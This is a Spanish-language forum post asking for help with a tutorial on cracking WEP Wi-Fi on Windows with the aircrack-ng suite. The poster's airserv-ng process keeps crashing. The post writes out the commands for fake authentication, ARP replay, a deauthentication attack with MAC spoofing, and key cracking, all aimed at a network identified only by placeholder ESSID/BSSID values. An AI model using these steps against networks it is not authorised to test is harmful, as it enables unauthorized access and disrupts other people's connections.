Problema con los paquetes.
buenas, le comento que estoy hace un tiempo metiendole a este tema. y segun parece todo esta correcto lo ke voy haciendo.
Primero ke nada, tengo una tarjeta Atheros AR9285 Wireless Network Adapter integrada en una compac presario CQ61.
Bueno, el asunto es ke sigo estos pasos como indicas en el tutorial, pero luego empieza a descargar los paquetes y en un momento aleatoreo el CMD con el comando airserv-ng -d "commview.dll|debug" -c 1 se cierra automaticamente y veo como se resetea el wifi y todo me queda trancado.
Estos son los pasos que estoy siguiendo.
Por favor ayudenme a continuar!!
airserv-ng -d "commview.dll|debug" -c 1
airodump-ng 127.0.0.1:666
aireplay-ng -1 0 -e ESSID -a BSSID -h HOST-MAC 127.0.0.1:666
MAC: 00:26:9E:CF:12:79
aireplay-ng -1 0 -e ESSID -a BSSID -h HOST-MAC 127.0.0.1:666
1- airserv-ng -d "commview.dll|debug" -c 1
2- airodump-ng 127.0.0.1:666
3- aireplay-ng -1 0 -e ESSID -a BSSID -h HOST-MAC 127.0.0.1:666
3. Ejecutamos "aireplay-ng -3 -b BSSID 127.0.0.1:666" ( Este comando esperará una petición ARP y cuando la consiga, veremos subir el campo Data/IVs en airodump-ng y un aviso de que ha recibido ARP). Podéis esperar un rato y quizás lo encuentre por si mismo. Si no para forzarlo seguís en el siguiente paso 4. Si no, saltáis al paso 5.
Hasta aqui puedo, despues no me permite llegar a continuar
4. Ejecutamos en otra consola un ataque de deautenticación "aireplay-ng -0 1 -a BSSID 127.0.0.1:666" ( Aquí puede ser necesario que cambieis vuestra mac previamente con macchanger ).
5. Cuando veamos en airodump que tenemos unos cuantos paquetes, ejecutamos en otra consola, sin cerrar airodump-ng, "aircrack-ng captura" y comenzará con el crackeo de la red hasta encontrar la clave. Necesitaremos al menos unos 10-30 mil paquetes de datos, esto es variable, a veces más.. a veces menos.
|